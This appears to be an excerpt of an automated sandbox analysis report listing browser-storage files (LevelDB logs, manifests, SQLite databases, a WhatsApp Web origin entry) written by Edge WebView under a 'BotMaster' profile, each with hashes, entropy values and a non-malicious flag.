                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):16
                                                                                                                                                                                                                Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:MANIFEST-000001.

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\Extension Scripts\000003.log

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):38
                                                                                                                                                                                                                Entropy (8bit):1.8784775129881184
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:3:FQxlXNQxlX:qTCT
                                                                                                                                                                                                                MD5:51A2CBB807F5085530DEC18E45CB8569
                                                                                                                                                                                                                SHA1:7AD88CD3DE5844C7FC269C4500228A630016AB5B
                                                                                                                                                                                                                SHA-256:1C43A1BDA1E458863C46DFAE7FB43BFB3E27802169F37320399B1DD799A819AC
                                                                                                                                                                                                                SHA-512:B643A8FA75EDA90C89AB98F79D4D022BB81F1F62F50ED4E5440F487F22D1163671EC3AE73C4742C11830214173FF2935C785018318F4A4CAD413AE4EEEF985DF
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:.f.5................f.5...............

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\Extension Scripts\CURRENT (copy)

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):16
                                                                                                                                                                                                                Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:MANIFEST-000001.

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\Extension Scripts\LOG

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):311
                                                                                                                                                                                                                Entropy (8bit):5.235114759434863
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:6:FQVUiYTohq1wknaZ5KrWLYQV+dp6FB2KLlvQVUVW1q2PwknaZ5KrWLYQV+dp65Ig:S+i+G1rHUdQFFL6+IvYrHUdQWFUv
                                                                                                                                                                                                                MD5:A5D13F6387B3F9195DCB42DA413656B9
                                                                                                                                                                                                                SHA1:B02705CBA3EBDE2AA6165C63E7DED0CD3C671F08
                                                                                                                                                                                                                SHA-256:7CDCC6980FBB93262C98D1B417FA8BEDE84C2B44B203849ED3B1AFFB1223D141
                                                                                                                                                                                                                SHA-512:7AB399911E2C9D35A467193B1DAE9B0934FAD6DAEFE5858087D2E04AC800D7FB4D61E947FC14A44F0898E81AC0B07CF12D397E397CA9D4A5301733AAC295595C
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:2024/03/10-17:46:01.577 1d60 Creating DB C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\Extension Scripts since it was missing..2024/03/10-17:46:01.603 1d60 Reusing MANIFEST C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\Extension Scripts/MANIFEST-000001.

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\Extension Scripts\MANIFEST-000001

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:OpenPGP Secret Key
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):41
                                                                                                                                                                                                                Entropy (8bit):4.704993772857998
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                                                MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                                                SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                                                SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                                                SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:.|.."....leveldb.BytewiseComparator......

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\Extension State\000001.dbtmp

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):16
                                                                                                                                                                                                                Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:MANIFEST-000001.

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\Extension State\000003.log

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):114
                                                                                                                                                                                                                Entropy (8bit):1.8784775129881184
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:3:FQxlXNQxlXNQxlXNQxlXNQxlXNQxlX:qTCTCTCTCTCT
                                                                                                                                                                                                                MD5:891A884B9FA2BFF4519F5F56D2A25D62
                                                                                                                                                                                                                SHA1:B54A3C12EE78510CB269FB1D863047DD8F571DEA
                                                                                                                                                                                                                SHA-256:E2610960C3757D1757F206C7B84378EFA22D86DCF161A98096A5F0E56E1A367E
                                                                                                                                                                                                                SHA-512:CD50C3EE4DFB9C4EC051B20DD1E148A5015457EE0C1A29FFF482E62291B32097B07A069DB62951B32F209FD118FD77A46B8E8CC92DA3EAAE6110735D126A90EE
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:.f.5................f.5................f.5................f.5................f.5................f.5...............

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\Extension State\CURRENT (copy)

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):16
                                                                                                                                                                                                                Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:MANIFEST-000001.

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\Extension State\LOG

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):307
                                                                                                                                                                                                                Entropy (8bit):5.228931349334662
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:6:FQVy1wknaZ5KrWLYQV+dpYg2KLlvQVwBQi+q2PwknaZ5KrWLYQV+dpNIFUv:SXrHUdNL6aBQi+vYrHUdwFUv
                                                                                                                                                                                                                MD5:DDAB68D50FA7291DE6578758D0FC102D
                                                                                                                                                                                                                SHA1:A35865FD1FCAF4695854E02E99E65324C3786322
                                                                                                                                                                                                                SHA-256:8659A5AFB85DF316F19377A9968BD3321D846C1D22DB4A92BC0B1C05004384B9
                                                                                                                                                                                                                SHA-512:1DFC1CD99AD1FA50B816015533357A50B64E6D96B82E8BABA7E60DF013865D45DEF659F6C549CA7D5E2696D025365447566382FE217A43C41E2E52224388A0D1
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:2024/03/10-17:46:02.374 1d5c Creating DB C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\Extension State since it was missing..2024/03/10-17:46:02.404 1d5c Reusing MANIFEST C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\Extension State/MANIFEST-000001.

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\Extension State\MANIFEST-000001

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:OpenPGP Secret Key
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):41
                                                                                                                                                                                                                Entropy (8bit):4.704993772857998
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                                                MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                                                SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                                                SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                                                SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:.|.."....leveldb.BytewiseComparator......

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\ExtensionActivityComp

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 1, cookie 0x1, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):4096
                                                                                                                                                                                                                Entropy (8bit):0.3169096321222068
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:3:lSWbNFl/sl+ltl4ltllOl83/XWEEabIDWzdWuAzTgdWj3FtFIU:l9bNFlEs1ok8fDEPDadUTgd81Z
                                                                                                                                                                                                                MD5:2554AD7847B0D04963FDAE908DB81074
                                                                                                                                                                                                                SHA1:F84ABD8D05D7B0DFB693485614ECF5204989B74A
                                                                                                                                                                                                                SHA-256:F6EF01E679B9096A7D8A0BD8151422543B51E65142119A9F3271F25F966E6C42
                                                                                                                                                                                                                SHA-512:13009172518387D77A67BBF86719527077BE9534D90CB06E7F34E1CCE7C40B49A185D892EE859A8BAFB69D5EBB6D667831A0FAFBA28AC1F44570C8B68F8C90A4
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\ExtensionActivityEdge

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 2, database pages 8, cookie 0x8, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):32768
                                                                                                                                                                                                                Entropy (8bit):0.40981274649195937
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:24:TL1WK3iOvwxwwweePKmJIOAdQBVA/kjo/TJZwJ9OV3WOT/5eQQ:Tmm+/9ZW943WOT/
                                                                                                                                                                                                                MD5:1A7F642FD4F71A656BE75B26B2D9ED79
                                                                                                                                                                                                                SHA1:51BBF587FB0CCC2D726DDB95C96757CC2854CFAD
                                                                                                                                                                                                                SHA-256:B96B6DDC10C29496069E16089DB0AB6911D7C13B82791868D583897C6D317977
                                                                                                                                                                                                                SHA-512:FD14EADCF5F7AB271BE6D8EF682977D1A0B5199A142E4AB353614F2F96AE9B49A6F35A19CC237489F297141994A4A16B580F88FAC44486FCB22C05B2F1C3F7D1
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j............M.....8...b..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\Favicons

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 2, database pages 13, cookie 0x8, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):26624
                                                                                                                                                                                                                Entropy (8bit):2.3514218388160737
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:96:7BCyRkzbd6umc6u74hh2PSZIopzlZ/EtMLMWLTqPUDB1g3:9NRmbd6e6I4hhtNbLTF1g3
                                                                                                                                                                                                                MD5:2828780658474ABCF8EC2B0C8E3C149D
                                                                                                                                                                                                                SHA1:41B628197E800731A60C501A695A8415C799739E
                                                                                                                                                                                                                SHA-256:93CBBFC5EFB8C01F666BEEB16CA113CD44AB3CACA1613CEA72CCFFA02FEFD287
                                                                                                                                                                                                                SHA-512:CDA79FD798F013B2D7F777AFBE9A0B4F2294D38107C34C252C10C95FD97C01E5D330ACF1181C8DC1D2056ED4ED3CB14C5A3F02E2260E3B799B6B275A6B43913A
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j..........g....._.c...~.2.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................s...;+...indexfavicon_bitmaps_icon_idfavico

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\File System\000\t\.usage

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):24
                                                                                                                                                                                                                Entropy (8bit):1.4575187496394222
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:3:ZlKwQsl:W
                                                                                                                                                                                                                MD5:35A6C3B4FE838413993C88D9DB65C73E
                                                                                                                                                                                                                SHA1:FBC0F9716FCDC03C7FCF908FED2C5ED73A5452F6
                                                                                                                                                                                                                SHA-256:DA74921979C4034FB77F61A6295C7C4D9A2196C831760D546E36AD959F240D23
                                                                                                                                                                                                                SHA-512:6AAD96386A306AFC8DFE170B4A84B7591E2F98F11FBEB5F81456E9CE806D3A7734B962F174E6B1904A23CE395F69C5809EF52B851BC0B5B207CB21BB974158D6
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:....FSU5................

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\File System\000\t\Paths\000001.dbtmp

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):16
                                                                                                                                                                                                                Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:MANIFEST-000001.

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\File System\000\t\Paths\CURRENT (copy)

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):16
                                                                                                                                                                                                                Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:MANIFEST-000001.

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\File System\000\t\Paths\LOG

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):323
                                                                                                                                                                                                                Entropy (8bit):5.202849004114985
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:6:FQXSLCf3Eq1wknaZ5KrWLYQV+d/9MRDVYRsL12KLlvQXSLYFadt+q2PwknaZ5Kro:SXSv1rHUd+ZV88BL6XSUHvYrHUd+ZV82
                                                                                                                                                                                                                MD5:E1A5E1AD699A3B651CBC4A93FEBE93F8
                                                                                                                                                                                                                SHA1:70447B3D9AF5AC7A4D7DF265EC766AF2852DBCE0
                                                                                                                                                                                                                SHA-256:041A4F13EB2492F0618F95EF31347E3ED62B28B7C5BD9AA1D1E70EEED8A36CE0
                                                                                                                                                                                                                SHA-512:6326E7734FCE6BDCFF2D69E7BD8404014B0110E6352957283F48D05B74FECBF64D02D57F1EF9B33FFF429C07F2BFE6CD5899D75F068EEE392DC86F5570B51982
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:2024/03/10-17:46:27.044 1f88 Creating DB C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\File System\000\t\Paths since it was missing..2024/03/10-17:46:27.070 1f88 Reusing MANIFEST C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\File System\000\t\Paths/MANIFEST-000001.

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\File System\000\t\Paths\MANIFEST-000001

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:OpenPGP Secret Key
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):41
                                                                                                                                                                                                                Entropy (8bit):4.704993772857998
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                                                MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                                                SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                                                SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                                                SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:.|.."....leveldb.BytewiseComparator......

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\File System\Origins\000001.dbtmp

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):16
                                                                                                                                                                                                                Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:MANIFEST-000001.

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\File System\Origins\000003.log

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):104
                                                                                                                                                                                                                Entropy (8bit):4.71553573229993
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:3:w1tsm1iIjRb/MlA1jNMsis71rVWihViVVn:w1tsmRFThVN5x4ihUVV
                                                                                                                                                                                                                MD5:5C8A5499075648DFFA516552873B2352
                                                                                                                                                                                                                SHA1:C5B03A008EFB5B59273849F051E015DC7CD8CA74
                                                                                                                                                                                                                SHA-256:0007C077FE33A7823DB950818CCDB0DEEFF2CAE75400427D5931D7AFC257F7DA
                                                                                                                                                                                                                SHA-512:A02BFBDAD13653D3994ED79C6D7BCF4070277FBA71A82F5E5629AA4945867EED73BC9538615E9B7BC4B0F0057888EB5D2BE479D9363BA4485FADF92072E9417B
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:mP...................LAST_PATH.-1..X.@................LAST_PATH.000..ORIGIN:https_web.whatsapp.com_0.000

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\File System\Origins\CURRENT (copy)

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):16
                                                                                                                                                                                                                Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:MANIFEST-000001.

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\File System\Origins\LOG

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):313
                                                                                                                                                                                                                Entropy (8bit):5.289298097919975
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:6:FQX5gs1wknaZ5KrWLYQV+d/9MRO2KLlvQXOcAL+q2PwknaZ5KrWLYQV+d/9MRgPn:SX5gLrHUd+YL6Xzg+vYrHUd+4uFUv
                                                                                                                                                                                                                MD5:CBB50135B9D9D1B10EB1548460F53C97
                                                                                                                                                                                                                SHA1:AB3D4398739454FA0F0403B025368190AF761277
                                                                                                                                                                                                                SHA-256:FBF9259759765BA76D28319EEB322256FC94EAEA227ACE5BA8F57948730EFBE5
                                                                                                                                                                                                                SHA-512:24633CF7D70A7FEDDBDF4F89B3AD03FFB86FDDD78AD246803DB05E69EEAE2124676EE9FDC6542C78916926F47D463839FC4C08CA23A159EBFF0CA357B3210132
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:2024/03/10-17:46:26.759 c9c Creating DB C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\File System\Origins since it was missing..2024/03/10-17:46:26.789 c9c Reusing MANIFEST C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\File System\Origins/MANIFEST-000001.

